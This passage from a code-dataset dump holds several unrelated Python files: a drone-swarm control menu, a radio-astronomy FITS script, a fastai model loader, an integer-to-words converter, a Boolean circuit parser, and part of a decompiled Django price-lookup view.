swarm_3,swarm_4 = swarm2.swarm_separate(crazyflies_1, crazyflies_2)\n swarm_3.takeoff_ascyn(hight+1, 10)\n swarm_4.takeoff_ascyn(hight-1, 10)\n swarm_3.take_formation(distance, 1, hight+1, 0, 0)\n swarm_4.take_formation(distance, sep_swarm, hight-1, 0, 0)\n swarm_3.navigation_2([-4,-4,hight+1], 10)\n swarm_4.navigation_2([4,4,hight-1], 10)\n\n print(\"tekrar birleşim yapılıyor....\")\n timeHelper.sleep(10)\n swarm2.take_formation(distance,sep_swarm, hight, 0, 0)\n #not working like expected\n elif selection == 6 :\n point_x = float(input(\"x : \"))\n point_y = float(input(\"y : \"))\n angle = m.atan((point_y-cur_y)/(point_x-cur_x))\n angle = -angle*180/m.pi\n swarm2.rotasyon_3(swarm2.sum_rot+angle, cur_x, cur_y, hight, distance)\n swarm2.navigation_2([point_x,point_y,hight], 10)\n cur_x = point_x\n cur_y = point_y\n elif selection == 7:\n swarm2.takeoff_scyn(0, 5)\n hight = 0\n \n\n\ntimeHelper.sleep(10)\n\nswarm2.change_formation(1)\n\n\ntimeHelper.sleep(10)\n\n\n\n","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616447589","text":"direction=\"J2000 10:04:02.090 -6.28.29.604\"\ncl.done()\n\ndir_data = \"../../../ngc3110/ana/other/photmetry/\"\ndir_fits = \"../../../ngc3110/ana/data_nyquist/\"\ndata_flux_normal = \"ngc3110_flux_sfr.txt\"\ndata = np.loadtxt(dir_data + data_flux_normal,\n usecols = (0,1,2,3))\nd_ra, d_decl = data[:,0], data[:,1]\nd_halpha, d_vla = data[:,2], data[:,3]\n\n### nyquist2fits: h-alpha\nfor i in range(len(data)):\n cl.addcomponent(dir=str(d_ra[i])+\"deg, \"+str(d_decl[i])+\"deg\",\n flux=d_vla[i], fluxunit=\"Jy\",\n freq=\"230.0GHz\",\n shape=\"Gaussian\",\n majoraxis=\"3.00arcsec\",\n minoraxis=\"3.00arcsec\",\n positionangle=\"0.0deg\")\n\nia.fromshape(dir_fits + \"nyquist_vla_1.45GHz.image\",\n [50,50,1,1],\n overwrite = True)\ncs=ia.coordsys()\ncs.setunits([\"rad\",\"rad\",\"\",\"Hz\"])\ncell_rad=qa.convert(qa.quantity(\"1.6arcsec\"),\"rad\")[\"value\"]\ncs.setincrement([-cell_rad,cell_rad],\"direction\")\ncs.setreferencevalue([qa.convert(\"151.008708deg\", \"rad\")[\"value\"],\n qa.convert(\"-6.474890deg\",\"rad\")[\"value\"]],\n type = \"direction\")\ncs.setreferencevalue(\"230GHz\", \"spectral\")\ncs.setincrement(\"1GHz\", \"spectral\")\nia.setcoordsys(cs.torecord())\nia.setbrightnessunit(\"Jy/pixel\")\nia.modify(cl.torecord(),subtract=False)\nexportfits(imagename= dir_fits + 'nyquist_vla_1.45GHz.image',\n fitsimage= dir_fits + 'nyquist_vla_1.45GHz.fits',\n overwrite = True)\nia.close()\n","sub_path":"scripts_image_ngc3110/mypaper06_ny2fits/mypaper06_ny2fits_vla_1.45GHz.py","file_name":"mypaper06_ny2fits_vla_1.45GHz.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"207540303","text":"from fastai.text import *\n\n\ndef load_language_model():\n path = 'webapp/language_model'\n path_data_lm = 'data_lm_book.pkl'\n path_learn_lm = 'mini_train_lm_book'\n data_lm = load_data(path, path_data_lm)\n learn_language_model = language_model_learner(\n data_lm, AWD_LSTM, pretrained=False).load(path_learn_lm, with_opt=False)\n\n return learn_language_model\n\n\ndef load_classification_nlp():\n path = 'webapp/class'\n path_data_class = 'data_clas'\n path_learn_class = 'mini_train_clas100_with'\n data_class = load_data(path, path_data_class)\n learn_classification_nlp = text_classifier_learner(\n data_class, AWD_LSTM, pretrained=False).load(path_learn_class, with_opt=False)\n\n return learn_classification_nlp\n","sub_path":"webapp/load_data_nlp.py","file_name":"load_data_nlp.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"298501568","text":"# This Python program gets an integer input from a user and outputs the same integer in words\r\n# for example: 89,475,872,465 -->\r\n# eighty nine billion, four hundred and seventy five million, eight hundred and seventy two thousand, four hundred and sixty five\r\n\r\n# Get input from a user\r\n\r\nfrom functools import reduce\r\n\r\n# get integer from user input\r\nx = input('Please enter a positive integer less than 10**18: \\n')\r\nx = int(x)\r\n\r\n# ------------------------------------------------------------\r\n# Initialize\r\n\r\n# highest power of 10 this program can deal with\r\npower = 17\r\n\r\n# dictionary of powers of 1000 in words\r\npowers_in_words = {(0,1,2): '', (3,4,5): 'thousand', (6,7,8): 'million', (9,10,11): 'trillion', (12,13,14): 'gazillion', (15,16,17): 'super - gazillion'}\r\n\r\nsmall_dict = {0: '', 1: 'one', 2: 'two', 3: 'three', 4: 'four', 5: 'five',\r\n 6: 'six', 7: 'seven', 8: 'eight', 9: 'nine', 10: 'ten',\r\n 11: 'eleven', 12: 'twelve', 13: 'thirteen', 14: 'fourteen', 15: 'fifteen',\r\n 16: 'sixteen', 17: 'seventeen', 18: 'eighteen', 19: 'nineteen'}\r\n\r\nbig_dict = {2: 'twenty', 3: 'thirty', 4: 'forty', 5: 'fifty', 6: 'sixty', 7: 'seventy', 8: 'eighty', 9: 'ninety'}\r\n\r\n# this number remembers the 10th multiple so that we can add it to the ones multiple\r\ncombined_num = 0\r\n\r\n# list of integers that make up the input integer x\r\n# initialize to empty list\r\nint_list = []\r\n\r\n# word is only the word for a multiple of thousand, ex. five hundred and fifty three million\r\nword = []\r\n# combined_word is the combined list of all the words composing the entire integer, all the multiples of thousand\r\n# that's the word representing the entire input integer x\r\ncombined_word = []\r\n\r\n# ------------------------------------------------------------\r\n# Define functions\r\n\r\ndef int_to_word_decider(largest_remaining_multiple_of_10, largest_power_of_10):\r\n '''This function decides what word an integer corresponds to,\r\n based on it's power of 10 and the integer \r\n '''\r\n word = []\r\n # this number remembers the 10th multiple so that we can add it to the ones multiple\r\n global combined_num \r\n\r\n if largest_power_of_10 == 2:\r\n word.append(small_dict[largest_remaining_multiple_of_10])\r\n word.append('hundred')\r\n elif largest_power_of_10 == 1:\r\n if largest_remaining_multiple_of_10 == 1:\r\n combined_num += 10\r\n elif largest_remaining_multiple_of_10 > 1:\r\n word.append(big_dict[largest_remaining_multiple_of_10])\r\n else:\r\n combined_num += largest_remaining_multiple_of_10\r\n word.append(small_dict[combined_num])\r\n\r\n return word\r\n\r\n\r\ndef hundreds_to_words(int_list):\r\n '''This function converts a list of integers, representing a number less than 1000 into words.\r\n Input: int_list\r\n a list of integers representing a positive integer less than 1000\r\n this list must be non-empty and only of length 1 or 2 or 3\r\n the index of each integer represents a power of 10\r\n ex. a list [6,5,9] represents a number 956\r\n\r\n Output: a string, the integer that the list represents, in words, ex. nine hundred and fifty six\r\n '''\r\n\r\n word = []\r\n \r\n while int_list != []:\r\n\r\n #largest_remaining_multiple_of_10 is the largest multiple of 10 element left in int_list\r\n largest_remaining_multiple_of_10 = int_list[0]\r\n\r\n #largest_power_of_10 is the power of 10 that largest_remaining_multiple_of_10 is a multiple of\r\n #or just it's index in the int_list\r\n largest_power_of_10 = len(int_list)-1\r\n\r\n #update the word represending the integer\r\n word.append(int_to_word_decider(largest_remaining_multiple_of_10, largest_power_of_10))\r\n\r\n # remove the first element from the remaining int_list that you just took and put into a word\r\n int_list.pop(0)\r\n\r\n return word\r\n\r\ndef flatten(nested_list):\r\n '''This function flattens a list,\r\n Input: nested list of lists or a flat list (any list)\r\n Output: a list composed of lowers level elements ex. strings or integers '''\r\n\r\n flat_list = []\r\n\r\n for e in nested_list:\r\n if isinstance(e, list):\r\n for i in e:\r\n if isinstance(i, list):\r\n flatten(i)\r\n else:\r\n flat_list.append(i)\r\n else:\r\n flat_list.append(e)\r\n\r\n return flat_list\r\n\r\ndef rm_leading_zeros(int_list):\r\n '''This function removes leading zeroes from a list of integers\r\n If the input is a list of all zeroes, the output will be an empty list'''\r\n\r\n while int_list[0] == 0:\r\n int_list.pop(0)\r\n if int_list == []:\r\n break\r\n\r\n return int_list\r\n\r\ndef rm_trailing_empties(strings_list):\r\n '''This finction takes a list of strings as input and removes any empty strings\r\n at the end of the list, returning a new list, such that the last element is a non-empty string\r\n if strings_list is empty, or contains only empty strings, it returns an empty list'''\r\n\r\n if strings_list == []:\r\n return strings_list\r\n\r\n strings_list.reverse()\r\n \r\n while strings_list[0] == '':\r\n strings_list.pop(0)\r\n if strings_list == []:\r\n break\r\n\r\n strings_list.reverse()\r\n \r\n return strings_list\r\n \r\ndef list_to_string(word_list):\r\n '''This function takes a list of words as input and converts it to a proper sentence with ands ans spaces in the right places'''\r\n\r\n sentence = []\r\n word_list = rm_trailing_empties(word_list)\r\n\r\n for i in range(len(word_list)):\r\n\r\n e = word_list[i]\r\n e_is_last = (i == len(word_list)-1)\r\n \r\n if e != '':\r\n sentence.append(e)\r\n\r\n if e_is_last:\r\n break\r\n \r\n if e in powers_in_words.values():\r\n #if there are only 1 or 2 elements left in word_list after e\r\n if i >= len(word_list)- 3:\r\n sentence.append(' and ')\r\n else:\r\n sentence.append(', ')\r\n elif e == 'hundred':\r\n #if the next element is thousand, million, trillion,...\r\n if word_list[i+1] in powers_in_words.values():\r\n sentence.append(' ')\r\n else:\r\n sentence.append(' and ')\r\n else:\r\n sentence.append (' ')\r\n\r\n sentence = reduce(lambda x,y: x+y, sentence)\r\n \r\n return sentence\r\n\r\n# ------------------------------------------------------------\r\n# Convert the input integer x into a list of integers it is composed of int_list\r\n# the index of an integer in int_list corresponds to the power of 10 that it's a multiple of\r\n\r\nfor p in range(power,-1,-1):\r\n power_of_10 = x//10**p\r\n x = x%10**p\r\n int_list.append(power_of_10)\r\n\r\n# remove leading zeroes from int_list\r\nint_list = rm_leading_zeros(int_list)\r\n\r\nint_list.reverse()\r\n\r\n# ------------------------------------------------------------\r\n# Extract groups of multiples of thousand from the input integer x\r\n\r\n# largest power of 10 that x is divisible by\r\npower = len(int_list)-1\r\n\r\n# define groups of powers of 1000 of the components of x\r\ngroup_index = list(range(0,len(int_list),3))\r\n\r\n\r\n# loop though group_index to group the integers composing x into powers of 1000\r\ni=0\r\n\r\nwhile i< len(group_index)-1:\r\n \r\n sub_int_list = int_list[group_index[i]: group_index[i+1]]\r\n sub_int_list.reverse()\r\n #remove leading zeros from sub_int_list\r\n sub_int_list = rm_leading_zeros(sub_int_list)\r\n powers_tuple = tuple(range(group_index[i], group_index[i+1]))\r\n \r\n i += 1\r\n \r\n #pass sub_int_list to the hundreds_to_words function and get the <= hundreds number in words \r\n word = hundreds_to_words(sub_int_list)\r\n word = flatten(word)\r\n\r\n if word != []:\r\n combined_word.append(powers_in_words[powers_tuple])\r\n combined_word.append(word)\r\n \r\n combined_num = 0\r\n \r\n# get the remaining biggest powers of 10 composing the input integer x\r\nsub_int_list = int_list[group_index[i]:]\r\nsub_int_list.reverse()\r\n#remove leading zeros from sub_int_list\r\nsub_int_list = rm_leading_zeros(sub_int_list)\r\n\r\npowers_tuple = tuple(range(group_index[i], group_index[i]+3))\r\n\r\n#pass sub_int_list to the hundreds_to_words function and get the <= hundreds number in words\r\nword = hundreds_to_words(sub_int_list)\r\nword = flatten(word)\r\n\r\ncombined_word.append(powers_in_words[powers_tuple])\r\ncombined_word.append(word)\r\ncombined_word.reverse()\r\n\r\ncombined_word = flatten(combined_word)\r\nsentence = list_to_string(combined_word)\r\n\r\nprint(sentence)\r\n","sub_path":"integers-to-words.py","file_name":"integers-to-words.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197745457","text":"#!/usr/bin/env python3\n\nclass BrokenCircuitException(Exception):\n '''This exception is thrown by the constructor of the Cicruit class if\n it detects either undefined signals or combinational loops.\n '''\n pass\n\nclass Node(object):\n '''Base class for circuit nodes'''\n\n __nextid__ = 0\n\n def __init__(self):\n self.kids = []\n self.id = Node.__nextid__\n Node.__nextid__ += 1\n\n def __lt__(self, other):\n return self.id < other.id\n\n def __hash__(self):\n return hash(7879 + self.id) * hash(type(self))\n\n def getID(self):\n '''Get unique node id (as int)'''\n return self.id\n\n def getChildren(self):\n '''Get child nodes of this node'''\n return self.kids\n\n def getChild(self, i):\n '''Get i-th child of this node'''\n return self.kids[i]\n\n def setChild(self, i, nd):\n '''Set i-th child of this node'''\n self.kids[i] = nd\n\n def support(self):\n return set()\n\nclass Literal(Node):\n '''A circuit node representing a constant Boolean value, which is\n either True or False.\n '''\n\n def __init__(self, b):\n Node.__init__(self)\n self.value = b\n\n def __repr__(self):\n if self.value:\n return '1'\n else:\n return '0'\n\n def getValue(self):\n '''Get the literal's value'''\n return self.value\n\n def support(self):\n return set()\n\nclass Variable(Node):\n '''A circuit node representing a named internal or input signal.'''\n\n def __init__(self, name):\n Node.__init__(self)\n self.name = name\n\n def __repr__(self):\n return ('%s' % self.name)\n\n def getName(self):\n '''Get the name of the signal'''\n return self.name\n\n def support(self):\n return {self.name}\n\nclass OpNode(Node):\n '''Abstract base class for unary and binary logic gates.'''\n\n def getOp(self):\n '''Get a string representation of the node's function'''\n return self.opstr\n\n def getFun(self):\n '''Get the gate function of the node'''\n return self.f\n\nclass BinOp(OpNode):\n '''A circuit node representing a binary logic gate.'''\n\n def __init__(self, f, opstr, x, y):\n Node.__init__(self)\n self.kids = [x, y]\n self.f = f\n self.opstr = opstr\n\n def __repr__(self):\n return ('(%s %s %s)' % (self.kids[0], self.opstr, self.kids[1]))\n\n def eval(self, x, y):\n '''Evaluate the node's function with the given inputs'''\n return self.f(x, y)\n\n def support(self):\n return self.getChild(0).support() | self.getChild(1).support()\n\nclass UnOp(OpNode):\n '''A circuit node representing a unary logic gate.'''\n\n def __init__(self, f, opstr, x):\n Node.__init__(self)\n self.kids = [x]\n self.f = f\n self.opstr = opstr\n\n def __repr__(self):\n return ('(%s %s)' % (self.opstr, self.kids[0]))\n\n def eval(self, x):\n '''Evaluate the node's function with the given input'''\n return self.f(x)\n\n def support(self):\n return self.getChild(0).support()\n\n\nclass Circuit(object):\n '''Class representing a logic circuit.'''\n\n def __init__(self, name, inputs, outputs, eqs):\n self.name = name\n self.inputs = {x.name for x in inputs}\n self.outputs = {x.name for x in outputs}\n self.equations = dict()\n for (x,e) in eqs:\n self.equations[x.name] = e\n self.check()\n\n def check(self):\n '''Perform sanity checks on the circuit: all outputs defined, all\n inputs unconstrained, no undefined signals, no combinational\n loops. This function is called by the constructor. \n '''\n\n # Check that all outputs are defined\n for x in self.outputs:\n if not x in self.equations.keys():\n raise BrokenCircuitException(\"Undefined output '%s'\" % x)\n\n # Check that inputs are unconstrained\n for x in self.inputs:\n if x in self.equations.keys():\n raise BrokenCircuitException(\"Over-constrained input '%s' \" % x)\n\n # Check that only defined signals are used\n deps = {x: self.equations[x].support() for x in self.equations.keys()}\n signals = self.inputs | self.outputs | self.equations.keys()\n for x,ys in deps.items():\n for y in ys:\n if not y in signals:\n raise BrokenCircuitException(\"Undefined signal '%s'\" % y)\n\n # Check that there are no combinational loops in the circuit\n for x in deps.keys():\n stack = []\n def visit(y):\n if y in stack:\n raise BrokenCircuitException(\"Combinational loop detected: %s -> %s\" % (' -> '.join(stack), y))\n if not y in deps.keys():\n return\n stack.append(y)\n for z in deps[y]:\n visit(z)\n stack.pop()\n visit(x)\n\n def clean(self):\n '''Clean up the structure of the circuit: Collapse nodes with single\n fanout, remove dead nodes.\n '''\n\n # Collapse non-fanout nodes\n signals = self.outputs | self.equations.keys() | self.inputs\n fanout = {s: set() for s in signals}\n deps = {x: self.equations[x].support() for x in self.equations.keys()}\n for x, ys in deps.items():\n for y in ys:\n fanout[y].add(x)\n collapse = {x for x,ys in fanout.items() if len(ys) == 1}.difference(self.inputs)\n print (\"======================\")\n print (\"COLLAPSE:\")\n print (collapse)\n print (\"======================\")\n def eval(nd, a, b):\n f = nd.getFun()\n return Literal(f(a.getValue(), b.getValue()))\n for x in self.getSignals():\n def subst(nd):\n if type(nd) == Variable:\n y = nd.getName()\n if y in collapse:\n return subst(self.equations[y])\n else:\n return nd\n elif type(nd) == UnOp:\n nd.setChild(0, subst(nd.getChild(0)))\n return nd\n elif type(nd) == BinOp:\n c1 = subst(nd.getChild(0))\n c2 = subst(nd.getChild(1))\n if type(c1) is Literal and type(c2) is Literal:\n return eval(nd, c1, c2)\n else:\n nd.setChild(0, c1)\n nd.setChild(1, c2)\n return nd\n else:\n return nd\n e = self.equations[x]\n self.equations[x] = subst(e)\n\n # Remove dead nodes\n deps = {x: self.equations[x].support() for x in self.equations.keys()}\n def dependencies(x):\n try:\n return deps[x]\n except KeyError:\n return set()\n reachable = {x for x in self.outputs}\n while True:\n imgs = [dependencies(x) for x in reachable]\n nextReachable = {y for dep in imgs for y in dep}\n if nextReachable.issubset(reachable):\n break\n reachable |= nextReachable\n dead = signals.difference(reachable).difference(self.inputs)\n print (\"DEAD:\")\n print (dead)\n print (\"======================\")\n for s in dead:\n del self.equations[s]\n\n def getInputs(self):\n '''Returns the set of input identifiers.\n '''\n return self.inputs\n\n def getOutputs(self):\n '''Returns the set of output identifiers.\n '''\n return self.outputs\n\n def getSignals(self):\n '''Returns the set of identifiers for which a logic equation is\n defined. This includes the circuit's outputs and any internal\n signals.\n '''\n return self.equations.keys()\n\n def getEquation(self, x):\n '''Returns the root node of the logic expression assigned to signal x,\n where x is either an output or an internal signal.\n '''\n try:\n return self.equations[x]\n except KeyError:\n raise BrokenCircuitException(\"Undefined signal '%s'\" % s)\n\n def simulate(self, inputs):\n '''Simulate the circuit. Takes as input a dictionary, mapping input\n names to Boolean values. Returns a dictionary mapping input, output\n and internal signal names to Boolean values.\n '''\n\n value = {i: x for (i,x) in inputs.items()}\n\n def sim(node):\n if type(node) == Literal:\n return node.value\n elif type(node) == Variable:\n x = node.name\n try:\n return value[x]\n except KeyError:\n y = sim(self.getEquation(x))\n value[x] = y\n return y\n elif type(node) == UnOp:\n y = sim(node.getChild(0))\n return node.eval(y)\n elif type(node) == BinOp:\n y = sim(node.getChild(0))\n z = sim(node.getChild(1))\n return node.eval(y, z)\n else:\n raise \"Invalid node type.\"\n\n signals = self.getSignals()\n for x in signals:\n value[x] = sim(self.getEquation(x))\n return {s: x for (s,x) in value.items() if s in signals | self.inputs}\n\n def dot(self):\n s = 'digraph %s {\\n' % self.name\n s += ' rankdir=\"LR\";\\n'\n for x in self.getInputs():\n s += ' %s [label=\\\"%s\\\", shape=circle];\\n' % (x, x)\n for x in self.getOutputs():\n s += ' %s [label=\\\"%s\\\", shape=diamond];\\n' % (x, x)\n signals = [x for x in self.getSignals() if not x in self.getOutputs()]\n for x in signals:\n s += ' %s [label=\\\"%s\\\", shape=hexagon];\\n' % (x, x)\n drawn = dict()\n def draw(nd):\n if nd in drawn.keys():\n return ''\n elif type(nd) is Literal:\n s = '\\t%d [label=\"%d\", shape=rect];\\n' % (nd.getID(), nd.getValue())\n drawn[nd] = str(nd.getID())\n return s\n elif type(nd) is Variable:\n drawn[nd] = nd.getName()\n return ''\n elif type(nd) is UnOp:\n s = draw(nd.getChild(0))\n cid = drawn[nd.getChild(0)]\n myid = str(nd.getID())\n s += ' %s [label=\"%s\", shape=square, style=filled, color=gray];\\n' % (myid, nd.getOp())\n s += ' %s -> %s;\\n' % (cid, myid)\n drawn[nd] = myid\n return s\n elif type(nd) is BinOp:\n s = draw(nd.getChild(0))\n s += draw(nd.getChild(1))\n myid = str(nd.getID())\n lid = drawn[nd.getChild(0)]\n rid = drawn[nd.getChild(1)]\n s += ' %s [label=\"%s\", shape=square, style=filled, color=gray];\\n' % (myid, nd.getOp())\n s += ' %s -> %s;\\n' % (lid, myid)\n s += ' %s -> %s;\\n' % (rid, myid)\n drawn[nd] = myid\n return s\n else:\n raise TypeError('invalid node')\n for x in self.getSignals():\n e = self.getEquation(x)\n s += draw(e)\n s += ' %s -> %s' % (drawn[e], x)\n s += '}'\n return s\n\n def __repr__(self):\n s = 'circ %s {\\n' % self.name\n s += '\\tinputs: %s\\n' % ', '.join(sorted(self.inputs))\n s += '\\toutputs: %s\\n' % ', '.join(sorted(self.outputs))\n for x, e in self.equations.items():\n s += '\\t%s = %s\\n' % (x, e)\n s += '}'\n return s\n\n# ========================================================================= Parser\n\nfrom funcparserlib.parser import *\nfrom funcparserlib.parser import with_forward_decls\nfrom tokenize import generate_tokens, TokenInfo\nfrom io import StringIO\nfrom functools import reduce\n\nimport token\n\n# FIXME: There seems to be an inconsistency between the token.type and\n# the type constants defined in token!\nMY_NEWLINE = 58\nMY_NEWLINE2 = 56\n\ndef tokenize(s):\n return [t for t in generate_tokens(StringIO(s).readline)\n if t.type not in [token.ENDMARKER, token.NEWLINE, MY_NEWLINE, MY_NEWLINE2]]\n\ndef tokval(tok):\n return tok.string\n\ndef make_bool(s):\n return s == '1'\n\n# @RULE:\n# boolean ::= '1' | '0'\nboolean = (\n some(lambda tok: tok.type == token.NUMBER and tok.string in ['1','0'])\n >> tokval\n >> make_bool\n >> Literal\n)\n\n# @RULE\n# variable ::= NAME (as Variable)\nvariable = (\n some(lambda tok: tok.type == token.NAME)\n >> tokval\n >> Variable\n)\n\n# @RULE\n# variable ::= NAME (as string)\nname = (\n some(lambda tok: tok.type == token.NAME)\n >> tokval\n)\n\n# Operator functor\nop = (\n lambda s: some(lambda tok: tok.type == token.OP and tok.string == s)\n >> tokval\n)\n\ncomma = op(',')\n\n# Keyword functor\nkeyword = (\n lambda s: some(lambda tok: tok.type == token.NAME and tok.string == s)\n >> tokval\n )\n\n# @KEYWORD 'inputs'\ninp = keyword('inputs')\n\n# @KEYWORD 'outputs'\noutp = keyword('outputs')\n\n# @KEYWORD 'circ'\ncirc = keyword('circ')\n\nconst = lambda x: lambda _: x\n\n# Functor for operator construction. Returns a parser functor that\n# results in the second argument f, the function associated with the\n# operator.\nmakeop = lambda s, f: op(s) >> const(f)\n\n# Functor constructing a binary node\ndef make_node(f, opstr):\n return lambda x, y: BinOp(f, opstr, x, y)\n\n# Functor constructing a unary node\ndef make_unode(f, opstr):\n return lambda x: UnOp(f, opstr, x)\n\n# Functor constructing an output, which is just a pair of a variable\n# and an expression\ndef make_output(x, e):\n return (x, e)\n\n# Binary operators\nimport operator\nand_ = makeop('&', make_node(operator.and_, '&'))\nor_ = makeop('|', make_node(operator.or_,'|'))\nxor = makeop('^', make_node(operator.xor,'^'))\nnot_ = makeop('~', make_unode(operator.not_,'~'))\nasgn = makeop('=', make_output)\n\n# Evaluate a tree-ish expression by folding (reducing) it\ndef eval_expr(z, l):\n return reduce(lambda s, y: y[0](s, y[1]), l, z)\n\n# Evaluate a unary expression\ndef eval_uexpr(f, x):\n return f(x)\n\n# Evaluate a binary expression\ndef eval_binexpr(x, f, y):\n return f(x, y)\n\n# Assemble nested list\ndef assemble(x, y):\n if type(y) is list:\n return [x] + y\n else:\n return [x, y]\n\n# Currying\nunarg = lambda f: lambda x: f(*x)\n\n# Curried functors for evaluation functions and constructors\nf = unarg(eval_expr)\ng = unarg(eval_uexpr)\nh = unarg(eval_binexpr)\ncollect = unarg(assemble)\nmake_circ = unarg(Circuit)\n\n# @RULE:\n# primary ::= boolean | variable | '(' expr ')'\n@with_forward_decls\ndef primary():\n return boolean | variable | ((op('(') + expr + op(')')) >> (lambda x: x[1]))\n\n# @RULE\n# literal ::= not primary | primary\nliteral = not_ + primary >> g | primary\n\n# @RULE\n# minterm ::= literal (and literal)*\nminterm = literal + many(and_ + literal) >> f\n\n# @RULE\n# esop ::= minterm (xor minterm)*\nesop = minterm + many(xor + minterm) >> f\n\n# @RULE\n# expr \"\"= esop (or esop)*\nexpr = esop + many(or_ + esop) >> f\n\n# @RULE\n# assign = variable '=' expr\nassign = variable + asgn + expr >> h\n\n# @RULE\n# varlist ::= variable (',' variable)*\nvarlist = variable + many(skip(comma) + variable) >> collect\n\n# @RULE\n# inputs ::= 'inputs' ':' varlist\ninputs = skip(inp) + skip(op(':')) + varlist\n\n# @RULE\n# outputs ::= 'outputs' ':' varlist\noutputs = skip(outp) + skip(op(':')) + varlist\n\n# @RULE\n# body ::= (assign)*\nbody = many(assign)\n\n# @RULE\n# circuit ::= 'circ' name '{' inputs outputs body '}' EOF\ncircuit = (skip(circ) + name\n + skip(op('{'))\n + inputs\n + outputs\n + body\n + skip(op('}'))\n + skip(finished)) >> make_circ\n\n\nred = '\\033[31m'\nblue = '\\033[34;1m'\ngreen = '\\033[32m'\ncyan = '\\033[36m'\nnormal = '\\033[0m'\n\ndef print_info(message):\n print (cyan + \"[INFO ] \" + normal + message)\n\ndef print_error(message):\n print (red + \"[ERROR] \" + normal + message)\n\n\n# main parse function\ndef parse(filename):\n '''Parse a circuit from a given file'''\n\n print_info(\"Parsing file '%s'\" % filename)\n try:\n with open(filename, 'r') as f:\n s = f.read()\n tok = tokenize(s)\n return circuit.parse(tok)\n except FileNotFoundError as e:\n print_error(\"Could not open file '%s'\" % filename)\n raise e\n except BrokenCircuitException as e:\n print_error(\"%s\" % e)\n raise e\n except NoParseError as e:\n epos = e.state.pos\n etok = tok[epos]\n line = etok.line\n start = etok.start[1]\n end = etok.end[1]\n lineNo = etok.start[0]\n print_error(\"Syntax error in line %d:\" % lineNo)\n print_error(\"%s\" % line.replace('\\n',''))\n print_error((' '*start) + ('~'*(end-start+1)))\n raise e\n \n \n","sub_path":"TP1/circuit/circuit.py","file_name":"circuit.py","file_ext":"py","file_size_in_byte":17023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"123059616","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\BitBucket\\djmicrosip_apps\\django_microsip_consultaprecio\\django_microsip_consultaprecio\\views.py\n# Compiled at: 2017-09-22 14:04:55\nfrom microsip_api.comun.sic_db import get_conecctionname, first_or_none\nfrom django.db import connections\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nimport csv\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic.list import ListView\nfrom .forms import *\nfrom django.core import management\nfrom django.db import router\n\n@login_required(login_url='/login/')\ndef index(request, template_name='django_microsip_consultaprecio/index.html'):\n return render_to_response(template_name, {}, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login/')\ndef PrecioArticuloView(request, template_name='django_microsip_consultaprecio/precioarticulo.html'):\n form = ArticuloSearchForm(request.POST or None)\n nombre_empresa = Registry.objects.get(nombre='SIC_ConsultaPrecio_NombreEmpresa').get_value()\n if not nombre_empresa:\n nombre_empresa = ''\n slogan = Registry.objects.get(nombre='SIC_ConsultaPrecio_Slogan').get_value()\n if not slogan:\n slogan = ''\n cliente_eventual = Registry.objects.get(nombre='SIC_ConsultaPrecio_Cliente').valor\n msg = ''\n variable = ''\n articulo = ''\n precio_actual = 0\n descuento = 0\n art = None\n precio_original = 0\n ahorro = 0\n if form.is_valid():\n clave = form.cleaned_data['clave']\n try:\n art = ArticuloClave.objects.get(clave=clave)\n articulo = art.articulo\n except Exception as e:\n msg = 'No se encontro ningun articulo con esa clave.'\n else:\n try:\n articuloprecio = ArticuloPrecio.objects.get(articulo=articulo, precio_empresa__id=42)\n precio_original = articuloprecio.precio\n connection_name = get_conecctionname(request.session)\n c = connections[connection_name].cursor()\n c.execute(\"execute procedure precio_con_impto(%s,%s,'N','P','S')\" % (articulo.id, precio_original))\n variable = c.fetchall()\n precio_original = variable[0][0]\n c.close()\n except Exception as e:\n precio_original = 0\n\n if articulo:\n descuento = articulo.get_descuento_total(cliente_id=cliente_eventual, unidades=1)\n if descuento != 0:\n precio_actual = precio_original - precio_original * descuento / 100\n ahorro = '%.2f' % (precio_original - precio_actual)\n precio_actual = '%.2f' % precio_actual\n else:\n precio_actual = round(precio_original, 2)\n precio_actual = '%.2f' % precio_original\n precio_original = '%.2f' % precio_original\n imagenes = ImagenSlideChecador.objects.all().order_by('id')\n context = {'Descuento': descuento, \n 'Articulo': articulo, \n 'form': form, \n 'msg': msg, \n 'precio_original': precio_original, \n 'precio_actual': precio_actual, \n 'Ahorro': ahorro, \n 'nombre_empresa': nombre_empresa, \n 'slogan': slogan, \n 'imagenes': imagenes}\n return render_to_response(template_name, context, context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login/')\ndef InitialzeConfigurationDatabase(request):\n \"\"\" Agrega campos nuevos en tablas de base de datos. \"\"\"\n padre = first_or_none(Registry.objects.filter(nombre='PreferenciasEmpresa'))\n if request.user.is_superuser and padre:\n if not Registry.objects.filter(nombre='SIC_ConsultaPrecio_NombreEmpresa').exists():\n Registry.objects.create(nombre='SIC_ConsultaPrecio_NombreEmpresa', tipo='V', padre=padre, valor='')\n if not Registry.objects.filter(nombre='SIC_ConsultaPrecio_Slogan').exists():\n Registry.objects.create(nombre='SIC_ConsultaPrecio_Slogan', tipo='V', padre=padre, valor='')\n if not Registry.objects.filter(nombre='SIC_ConsultaPrecio_Cliente').exists():\n Registry.objects.create(nombre='SIC_ConsultaPrecio_Cliente', tipo='V', padre=padre, valor='')\n using = router.db_for_write(Almacen)\n management.call_command('syncdb', database=using, interactive=False)\n return HttpResponseRedirect('/precios/')\n\n\n@login_required(login_url='/login/')\ndef PreferenciasManageView(request, template_name='django_microsip_consultaprecio/preferencias.html'):\n msg = ''\n 